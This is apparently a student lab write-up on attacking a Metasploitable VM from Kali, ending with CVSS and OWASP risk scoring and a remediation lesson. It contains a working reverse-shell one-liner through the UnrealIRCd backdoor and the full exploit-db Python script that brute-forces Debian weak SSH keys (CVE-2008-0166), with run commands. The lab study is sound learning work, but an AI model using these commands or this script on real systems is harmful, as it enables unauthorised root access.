# 2
IP Addresses:
- KALI : 10.0.2.12
- METASPLOITABLE : 10.0.2.13
# 3
# 4
Command run `nc 10.0.2.13 1524`
to verify that we have root access in the vulnerable vm, we run the command:
`netstat -naop | grep 1524`
Explanation of netstat command:
Netstat stands for network statistics and it shows which port is open and/or established.
The following options provides the output:
```csvpreview
Option,Description
n,Show addresses and port numbers
a,List all ports and connections
o,Displays process identifier (PID) for each connection
p,Display protocol of connection
```
By running the netstat command, we can see on the `ESTABLISHED` TCP connection that the Kali Linux VM (10.0.2.12) is connected successfully to the metasploitable VM (10.0.2.13). Also the whoami command shows that I have gained root access to the metasploitable VM.
# 5
The password is shown to be `password` and running `whoami` and `netstat -pent`
# 7
Additional Exploit 1:
This is done using metasploit.
For the non-metasploit version:
Find the exploit using the command :`searchsploit unrealircd`
This is done to see where to download the necessary payload.
The `Remote Downloader/Execute Trojan` - 13853.pl exploit seems like the right script to use. To see the exploit script, the following command is run:
`gedit /usr/share/exploitdb/platforms/linux/remote/13853.pl`
Credit :
- (https://ivanitlearning.wordpress.com/2020/09/11/hackthebox-irked/)
- (https://0xdf.gitlab.io/2019/04/27/htb-irked.html)
We found out that `AB` is the backdoor command for UnrealIRCd.
In order to start the exploit
`nc -nlvp 443`
`nc 10.0.2.13 6667`
`AB;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.12 443 >/tmp/f`
The results shows that we have gained root access. There is a connection established between the 2 VMs through the UnrealIRCd port and the new port created for the exploit.
Additional Exploit 2:
https://www.rapid7.com/db/vulnerabilities/openssl-debian-weak-keys/
The exploit ID : CVE-2008-0166
Searching in www.exploit-db.com, we can use the python version in order to execute the exploit. Python code can be found here : https://www.exploit-db.com/exploits/5720.
```python
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False
def Finish(self):
self.end = True
def GetEnd(self):
return self.end
#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()
#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' <host>: The victim host'
print ' <user>: The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize
print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# milw0rm.com [2008-06-01]
```
This is saved as `5720.py`. To brute force the keys we can download the common keys from : https://github.com/g0tmi1k/debian-ssh/tree/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
Unzipping the keys to `rsa/2048` folder:
`python 5720.py rsa/2048 10.0.2.13 root`
Execute: `ssh -lroot -p22 -i rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.0.2.13`
# 8
As the 4 vulnerabilities are similar since they're dealing with reverse shells or remote shell, the CVSS scoring tool below applies to all 4 of them
```csvpreview
Metric, Value, Description
Attack Vector, Network, Attack is done through a network exploit (reverse shell| vnc | etc.)
Attack Complexity, Low, Only need to scan and can be easily done with a preset code/commands
Privileges Required, None, There's no password or any type of privilege escalation needed.
User Interaction, None, No user interaction necessary
Scope, Unchanged,Vulnerability affects the same machine as the shell.
Confidentiality, High, Attacker will have root access and is able to read files
Integrity, High, Attacker will have root access and is able to write/modify files
Availability, High, Attacker will have root access and can stop any service.
```
The score is 9.8, which is considered critical. Main method of securing the machine would be updating the security on the metasploitable vm since the vulnerabilities are already recorded and available extensively in the wild. Make sure that the critical nessus assessments are removed.
To further solidify the threat, we would also use the OWASP risk calculator:
```csvpreview
Metric, Level, Description
Skill Level, Some Technical Skills, Need to at least know how to run metasploit and python
Motive, Possible Reward, Server has possible reward to steal
Opportunity, No access or resources required, The server can easily be attacked through the network
Size, Anonymous Internet Users, Can exploit through the network easily
EAse of Discovery, Automated Tools available, Metasploit is available
Ease of Exploit, Easy, there are codes and commands available on the internet
Awareness, Obvious, CVE ID available
Intrusion Detection, Not logged, No logging done to check the intrusion
Loss of confidientiality, extensive critical data disclosed, There will be high number of sensitive data disclosed assuming it's a server
Loss of availability, minimal primary service interrupted, little disruption to the running of the server but there may be extra traffic in the network
Loss of integrity, Extensive seriously corrupted data, With root acess data in the server can be easily changed.
Loss of accountability, Possibly tracable, It is possible to get the attacker IP address from just netstat
Financial damage, significant effect on annual profit, sensitive financial data can ruin the business assuming the server belongs to a small business
Reputation damage, brand damage, loss of customer trust since the data is out in the wild now
Non-compliance, high profile violation, too many misconfig and easy to fix exploits
privacy violations, hundreds of people, both customer and business stakeholders will be affected assuming the server belongs to a small business.
```
Extensive damage can be done when there are too many violations to the security details. This exercise has taught me to make sure that the machines that we have are always up to date lest there be exploits that can be exploited easily once it is recorded in metasploit or the web. Critical exploits must always be fixed in order to have a secure system. I have personally learned that exploiting known exploits is actually not that hard.
Sign in with Wallet
Connect another wallet